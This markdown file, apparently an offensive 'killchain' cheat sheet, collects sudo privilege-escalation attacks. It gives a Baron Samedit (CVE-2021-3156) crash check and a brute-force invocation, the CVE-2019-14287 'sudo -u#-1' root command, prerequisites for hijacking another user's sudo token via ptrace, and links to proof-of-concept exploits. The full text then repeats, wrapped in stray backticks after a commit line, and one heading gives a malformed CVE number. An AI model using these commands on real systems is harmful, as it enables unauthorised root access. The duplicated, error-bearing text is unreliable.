killchain-compendium/Exploits/Linux/sudo.md

# CVE-2021-3156 Baron Samedit

* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via
```sh
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
```
* Defaults to try
```sh
./brute.sh 90 120 50 70 150 300
```

## CVE-2019-14287

* Versions < 1.8.28

### Usage 

* Integer overflow with resulting root status.
```sh
sudo -u#-1 <app>
```
## CVE-18634 

* Sudo pwnge with pwfeedback()
* Sudo version 1.7.1 to 1.8.30
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)


## Reusing Sudo Token

* Reuse sudo token of currently logged in user
* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)

* `ptrace` has to be fully enabled
```sh
cat /proc/sys/kernel/yama/ptrace_scope
0
```
* sudo has to be triggered the last 15 minutes, check `ps wuax`
* `gdb` has to be installed
* One must be logged in as the same user which should be owned
* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)

## Heap Based Overflow

* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911)

Marco Benatto: 
> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains  
a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result  
in a heap-based buffer over-read. This can be triggered by arbitrary local  
users with access to Sudo by entering a password of seven characters or 
 fewer. The impact could vary depending on the compiler and processor architecture.
restructured Exploits 2022-11-13 22:38:01 +01:00			`# CVE-2021-3156 Baron Samedit`

			`* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)`
			`* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)`
			`* Heap based overflow`
			`* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1`
			`* Check vulnerability via`
			```sh
			`sudoedit -s '\' $(python -c "print('\x41' * 10000)")`
			```
			`* Defaults to try`
			```sh
			`./brute.sh 90 120 50 70 150 300`
			```

			`## CVE-2019-14287`

			`* Versions < 1.8.28`

			`### Usage`

			`* Integer overflow with resulting root status.`
			```sh
			`sudo -u#-1 <app>`
			```
			`## CVE-18634`

			`* Sudo pwnge with pwfeedback()`
			`* Sudo version 1.7.1 to 1.8.30`
			`* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)`


			`## Reusing Sudo Token`

			`* Reuse sudo token of currently logged in user`
			`* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)`

			* `ptrace` has to be fully enabled
			```sh
			`cat /proc/sys/kernel/yama/ptrace_scope`
			`0`
			```
			* sudo has to be triggered the last 15 minutes, check `ps wuax`
			* `gdb` has to be installed
			`* One must be logged in as the same user which should be owned`
			`* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)`

			`## Heap Based Overflow`

			`* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911)`

			`Marco Benatto:`
			`> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains`
			`a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result`
			`in a heap-based buffer over-read. This can be triggered by arbitrary local`
			`users with access to Sudo by entering a password of seven characters or`
			`fewer. The impact could vary depending on the compiler and processor architecture.`